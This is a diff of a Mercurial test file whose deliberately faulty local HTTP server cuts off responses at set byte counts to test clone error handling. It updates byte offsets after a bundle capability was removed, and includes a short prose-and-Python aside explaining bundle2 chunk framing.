+ write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (738) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (715) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (678) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (637) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (616) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (614) \r\n (no-py3 !)
+ write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -463,7 +464,7 @@
Server sends incomplete headers for getbundle response
- $ hg serve --config badserver.closeaftersendbytes=940 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=921 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
TODO this output is terrible
@@ -486,17 +487,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (904) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (881) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (844) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (803) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (782) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (780) \r\n (no-py3 !)
- write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (761) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (885) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (862) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (825) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (784) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (763) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (761) \r\n (no-py3 !)
+ write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -520,7 +521,7 @@
readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
- readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
+ readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob)
readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob)
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
@@ -544,7 +545,7 @@
Server stops before it sends transfer encoding
- $ hg serve --config badserver.closeaftersendbytes=973 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=954 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -573,7 +574,7 @@
Server sends empty HTTP body for getbundle
- $ hg serve --config badserver.closeaftersendbytes=978 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=959 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -591,17 +592,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (942) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (919) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (882) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (841) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (820) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (818) \r\n (no-py3 !)
- write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (799) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (923) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (900) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (863) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (822) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (801) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (799) \r\n (no-py3 !)
+ write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -625,7 +626,7 @@
readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
- readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
+ readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob)
readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob)
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
@@ -651,7 +652,7 @@
Server sends partial compression string
- $ hg serve --config badserver.closeaftersendbytes=1002 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=983 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -669,17 +670,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (966) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (943) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (906) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (865) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (844) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (842) \r\n (no-py3 !)
- write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (823) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (947) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (924) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (887) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (846) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (825) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (823) \r\n (no-py3 !)
+ write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -702,7 +703,7 @@
readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
- readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
+ readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob)
readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob)
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
@@ -733,7 +734,7 @@
Server sends partial bundle2 header magic
- $ hg serve --config badserver.closeaftersendbytes=999 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=980 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -778,7 +779,7 @@
Server sends incomplete bundle2 stream params length
- $ hg serve --config badserver.closeaftersendbytes=1008 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=989 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -825,7 +826,7 @@
Server stops after bundle2 stream params header
- $ hg serve --config badserver.closeaftersendbytes=1011 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=992 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -871,7 +872,7 @@
Server stops sending after bundle2 part header length
- $ hg serve --config badserver.closeaftersendbytes=1020 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1001 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -920,7 +921,7 @@
Server stops sending after bundle2 part header
- $ hg serve --config badserver.closeaftersendbytes=1067 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1048 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -973,7 +974,7 @@
Server stops after bundle2 part payload chunk size
- $ hg serve --config badserver.closeaftersendbytes=1088 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1069 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1029,7 +1030,7 @@
Server stops sending in middle of bundle2 payload chunk
- $ hg serve --config badserver.closeaftersendbytes=1549 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1530 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1086,7 +1087,7 @@
Server stops sending after 0 length payload chunk size
- $ hg serve --config badserver.closeaftersendbytes=1580 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1561 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
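
The escaped byte groups in the surrounding output follow the bundle2 wire format nested inside HTTP chunked encoding: the hex prefixes (4\r\n, 29\r\n, ...) are HTTP chunk sizes, while 4-byte big-endian values such as \x00\x00\x00) and \x00\x00\x00\x00 are bundle2 payload-chunk lengths, a zero length ending the part. A minimal sketch of the bundle2 layer (illustrative; not Mercurial's bundle2 module):

    import struct

    def frame_part_payload(chunks):
        """Frame payload chunks bundle2-style: u32-be length, then data."""
        for chunk in chunks:
            yield struct.pack(">I", len(chunk)) + chunk
        yield struct.pack(">I", 0)  # \x00\x00\x00\x00 terminates the part

    # 0x29 == 41, matching the "\x00\x00\x00)" length prefixes in the log
    assert struct.pack(">I", 0x29) == b"\x00\x00\x00)"
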
@@ -1148,8 +1149,7 @@
Server stops sending after the size-0 bundle2 part header (indicating end of bundle2 payload)
This is before the size-0 chunked-transfer chunk that signals the end of the HTTP response.
-# $ hg serve --config badserver.closeaftersendbytes=1755 -p $HGPORT -d --pid-file=hg.pid -E error.log
- $ hg serve --config badserver.closeaftersendbytes=1862 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1736 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1165,25 +1165,20 @@
$ killdaemons.py $DAEMON_PIDS
#if py36
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -25
- sendall(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- sendall(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- sendall(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- sendall(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- sendall(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- sendall(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- sendall(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- sendall(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- sendall(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- sendall(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- sendall(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- sendall(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -20
+ sendall(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ sendall(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ sendall(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
